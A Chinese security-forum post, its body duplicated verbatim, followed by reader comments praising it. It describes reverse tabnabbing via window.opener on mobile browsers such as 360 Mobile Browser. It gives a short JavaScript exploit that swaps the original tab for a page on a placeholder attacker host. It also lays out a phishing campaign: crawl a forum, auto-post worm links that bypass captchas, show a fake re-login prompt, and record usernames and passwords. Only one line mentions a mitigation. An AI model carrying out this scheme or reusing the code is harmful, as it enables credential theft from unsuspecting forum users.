利用手机浏览器网页替换漏洞进行钓鱼
土司号马上就要封了,不想离开土司这个大家庭,还想在这里继续学习,写篇文章,大牛略过。。。。 喷的时候请不要匿名!!!PS:我这人很记仇!
拿360手机浏览器举例,其他浏览器想玩的可以自己测试下。
W3C规则中有很多偏执的js代码,比如parent.window.opener 它的作用是允许多窗口的浏览器,新打开的子页面可以调动父页面的location.href 这个用法在黑客攻击中不常见,因为W3C根据同源策略,父页面的改变中的referer将是子页面 最常见的用法就是在百度中,博彩网站的流量之争。
如上图在百度搜索 888的一个关键字中,我们点击下去以后就会如下图:
不仅仅打开了一个新的页面,旧的百度页面也因此被替换掉,为此百度只能在爬行中做出防御,但是难免会有漏网之鱼。
因为PC端视乎无法利用,原因如下:
1.PC端浏览器存在地址栏
2.PC端浏览器看得到页面变动状态
3.PC端防御功能齐全
但是相比移动端:
1.移动端地址栏默认隐藏
2.移动端浏览器在新的页面时将无法看到旧页面的变更状态
3.移动端防御功能相对薄弱
我们看一下一个例子,就在360安全论坛的一个帖子里,我发送了一个链接。
我将链接变成了一个逗号,点击之后他将会跳转到我的攻击页面。
在攻击页面上不放置任何内容,也可以设置一些无聊的内容,我们的目的是将原来的1号窗口替换掉,甚至可以设置延时关闭。
这时候我们回到原来的一号窗口,我们很难发现页面被替换掉了,这个页面由于是临时加工,所以没有复制头像,其实页面可以使用kali的工具直接爬行。
由于浏览器默认选择的隐藏URL所以漏洞将造成严重危害。
贴下利用的exp
1.exploit:
<script type="text/javascript" >
if (parent.window.opener) {
parent.window.opener.location = 'http://www.xxxxx.com/attack.html';
};
</script>
2.漏洞的利用与危害
①:爬行想要攻击论坛所有帖子,自动匹配URL,生成假页面与attack页面。
/*假页面参考社会工程学因素,让人觉得attack页面只是个无聊的页面,或者设置自动关闭,有条件可以设置浏览器识别*/
②:识别验证码/蠕虫自动发帖,附上attack代码指向假页面。
③:所有将页面引向登陆页面
/*对不起,由于您状态异常,请重新登陆*/
④:记录下用户名与密码。
对存在parent.window.opener的页面默认不予以新窗口打开。
由于整个过程中用户只因为在网页中点击了一个链接,在新窗口打开页面的时候,旧页面的代码已经被替换,并且一模一样,无法识别,所以危害较高。
故可以实现钓鱼的目的!!!
TCV=4(不知道是不是有点高,反正别踩贴就行了,小菜经历过论坛里匿名的语言攻击给小菜的心灵带来了很大的伤害。)
拿360手机浏览器举例,其他浏览器想玩的可以自己测试下。
W3C规则中有很多偏执的js代码,比如parent.window.opener 它的作用是允许多窗口的浏览器,新打开的子页面可以调动父页面的location.href 这个用法在黑客攻击中不常见,因为W3C根据同源策略,父页面的改变中的referer将是子页面 最常见的用法就是在百度中,博彩网站的流量之争。
如上图在百度搜索 888的一个关键字中,我们点击下去以后就会如下图:
不仅仅打开了一个新的页面,旧的百度页面也因此被替换掉,为此百度只能在爬行中做出防御,但是难免会有漏网之鱼。
因为PC端视乎无法利用,原因如下:
1.PC端浏览器存在地址栏
2.PC端浏览器看得到页面变动状态
3.PC端防御功能齐全
但是相比移动端:
1.移动端地址栏默认隐藏
2.移动端浏览器在新的页面时将无法看到旧页面的变更状态
3.移动端防御功能相对薄弱
我们看一下一个例子,就在360安全论坛的一个帖子里,我发送了一个链接。
我将链接变成了一个逗号,点击之后他将会跳转到我的攻击页面。
在攻击页面上不放置任何内容,也可以设置一些无聊的内容,我们的目的是将原来的1号窗口替换掉,甚至可以设置延时关闭。
这时候我们回到原来的一号窗口,我们很难发现页面被替换掉了,这个页面由于是临时加工,所以没有复制头像,其实页面可以使用kali的工具直接爬行。
由于浏览器默认选择的隐藏URL所以漏洞将造成严重危害。
贴下利用的exp
1.exploit:
<script type="text/javascript" >
if (parent.window.opener) {
parent.window.opener.location = 'http://www.xxxxx.com/attack.html';
};
</script>
2.漏洞的利用与危害
①:爬行想要攻击论坛所有帖子,自动匹配URL,生成假页面与attack页面。
/*假页面参考社会工程学因素,让人觉得attack页面只是个无聊的页面,或者设置自动关闭,有条件可以设置浏览器识别*/
②:识别验证码/蠕虫自动发帖,附上attack代码指向假页面。
③:所有将页面引向登陆页面
/*对不起,由于您状态异常,请重新登陆*/
④:记录下用户名与密码。
对存在parent.window.opener的页面默认不予以新窗口打开。
由于整个过程中用户只因为在网页中点击了一个链接,在新窗口打开页面的时候,旧页面的代码已经被替换,并且一模一样,无法识别,所以危害较高。
故可以实现钓鱼的目的!!!
TCV=4(不知道是不是有点高,反正别踩贴就行了,小菜经历过论坛里匿名的语言攻击给小菜的心灵带来了很大的伤害。)
评论35次
不错,感谢分享
新知识很棒,学xi了
新路线,撸主是怎么发现这个的? 是研究W3C的文档吗
这思路不错~新姿势啊,感谢分享技术!
这样的想法很不错,如果实施起来的话很难防御,基本能有 70%的几率成功。
这个是a标签的 target='_blank' 造成的 属性里再加上rel='noparent' 就解决这个问题了
不是太懂,基本功还是不够扎实
顶lz把这么好的技巧分享出来,勉励我等继续分享出更好的渗透技巧
感谢大牛分享思路
还有这样的,学xi了。
非常好的一个思路,配合些猥琐的社工,能量很大
不错不错,现在的主流应该放在手机端了,对应手机端的文章都应该好好研读.估计pc快要过时了!
这个东西叫做,百度点击劫持,几年前的东西了。
麻烦解释下什么叫百度点击劫持???
这个东西叫做,百度点击劫持,几年前的东西了。
认真看了一遍发现这篇文章很有意思 我已经收藏了 像这种文章 应该多发 好让我们这些小菜见识一下“世面”
思路不错,其实手机上的 wifi认证也可以拿来钓
这个思路非常的好, 用来做钓鱼社工很不错, 重点在于骗对方点击连接
以前看到过这种替换父窗口的,未曾深入,学xi了,谢谢HOPE.
思路不错!赞
这也算是一种新的钓鱼方式了